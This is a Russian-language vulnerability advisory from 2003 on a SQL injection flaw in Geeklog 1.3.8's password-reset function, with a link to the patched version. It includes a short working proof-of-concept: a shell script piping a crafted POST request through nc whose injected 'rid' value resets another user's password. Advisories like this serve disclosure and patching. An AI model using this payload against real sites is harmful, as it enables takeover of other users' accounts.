Sql инъекция в Geeklog
| Дата публикации: | 21.10.2003 |
| Всего просмотров: | 1240 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Geeklog 1.3.8
Описание: Уязвимость обнаружена в Geeklog. Злонамеренный пользователь может манипулировать SQL запросами. Злонамеренный пользователь может манипулировать параметром "reqid" при обновлении пароля, чтобы изменить пароль произвольного пользователя. Пример/Эксплоит: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1& " | nc localhost 80 URL производителя:http://www.geeklog.net Решение: Обновите программу до 1.3.8-1sr2: http://www.geeklog.net/filemgmt/visit.php?lid=254 |
|
| Ссылки: | Geeklog |